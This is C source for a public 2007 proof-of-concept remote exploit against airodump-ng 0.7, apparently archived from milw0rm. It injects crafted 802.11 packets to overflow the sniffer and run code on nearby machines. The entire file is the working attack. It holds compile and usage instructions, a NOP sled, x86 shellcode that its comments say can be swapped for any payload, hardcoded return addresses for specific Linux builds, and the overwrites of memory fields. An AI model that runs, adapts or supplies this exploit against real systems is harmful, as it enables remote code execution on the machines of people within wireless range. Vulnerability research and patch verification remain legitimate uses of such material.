/**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
*
* Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng.
*
* This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details.
*
* Compiling:
*
* gcc -o airodump-remote airodump-remote.c -lorcon
*
* Usage:
*
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
*
* Drivers supported by lorcon:
*
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
*
* Header types:
*
* 0 - None (not tested)
* 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested)
*
* Return addresses:
*
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
*
* Example usage:
*
* ./airodump-ng wlan0 prism54 11 1 0x8054934
*
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
*
* Copyright (C) 2007 Jonathan So
*/
#include <stdio.h>
#include <stdlib.h>
#include <tx80211.h>
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message
// start:
"\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length
"\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit
// get_message:
"\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text
int main(int argc, char **argv)
{
tx80211_t tx;
tx80211_packet_t txp;
uint8_t packet[1044];
uint8_t *ppacket;
int headertype;
unsigned ret_addr = 0x8054934;
FILE *fp;
if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype>
[ret_addr]\n", argv[0]);
exit(1);
}
if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16);
}
headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver");
return 1;
}
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n");
return 1;
}
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n");
}
if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n");
return 1;
}
txp.packet = packet;
// Fill packet with nops
memset(packet, 0x90, sizeof(packet));
switch (headertype) {
case 0:
// No arptype, just send raw packet
ppacket = packet;
break;
case 1:
// Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8;
break;
case 2:
// Send fake radiotap header
packet[0] = 0;
packet[2] = 3;
ppacket = packet + 3;
break;
default:
printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n");
printf(" 1 - prism54\n");
printf(" 2 - radiotap\n");
return 1;
}
// set some necessary 802.11 header fields
ppacket[0] = 0xB0;
ppacket[1] = 0;
ppacket[24] = 1;
ppacket[25] = 0;
ppacket[26] = 2;
ppacket[27] = 0;
txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n");
return 1;
}
ppacket[26] = 4;
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n");
return 1;
}
// Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
// Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4);
// Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
// Return address
memcpy(ppacket+820, &ret_addr, 4);
ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n");
return 1;
}
tx80211_close(&tx);
return 0;
}
// milw0rm.com [2007-04-12]
